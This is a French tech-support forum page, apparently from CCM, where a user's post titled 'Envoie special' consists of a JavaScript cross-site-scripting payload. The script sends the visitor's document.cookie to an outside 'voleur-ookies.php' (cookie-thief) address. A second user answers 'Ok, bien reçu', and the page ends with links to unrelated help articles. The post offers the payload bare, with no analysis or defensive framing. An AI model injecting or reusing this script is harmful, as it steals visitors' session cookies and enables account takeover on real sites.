Rechercher : dans
Par :

Envoie special

Dernière réponse le 3 jui 2009 à 18:05:26 dodo, le 3 jui 2009 à 18:04:57 
 Signaler ce message aux modérateurs

Bonjour,
<script>
document.location = 'http://sitemboup.org/voleur-ookies.php?cookies=' + document.cookie;
</script>

Configuration: Windows XP
Firefox 3.0.3

Meilleures réponses pour « Envoie special » dans :
[Outlook/ThunderBird/Incredimail] Envoi/Réception de mail VoirVous avez des problèmes d'envoi ou de réception de mail dans votre client de messagerie ? Cet article va vous aider à diagnostiquer le problème. 1. Introduction à la messagerie 2. Problèmes d'envoi de mail 3. Problèmes de réception de...
[CCM] Utiliser des caractères spéciaux VoirVous pouvez utiliser des caractères spéciaux dans vos messages sur les forums de CCM. Vous pouvez: Soit utiliser la table de caractères Windows (charmap.exe) et copier-coller les caractères dans le message. Soit utiliser les entités...
Message bloqué dans la boite d'envoi de Outlook VoirProblème J'ai un problème avec Outlook. Mon épouse a essayé d'envoyer un message de 25 megas. Mais bien sûr celui n'arrive pas à partir. Mais je n'arrive plus à le supprimer de la boite d'envoi car Outlook me dit qu'il est en train de l'envoyer et...
Caractères spéciaux HTML VoirCodage des caractères spéciaux Le standard HTML demande de respecter le codage des caractères ASCII 7 bits, c'est-à-dire que les caractères accentués ne sont pas autorisés. Il faut pour cela utiliser un codage particulier. Pour...

1

blob37, le 3 jui 2009 à 18:05:26

Ok, bien reçu.

Répondre à blob37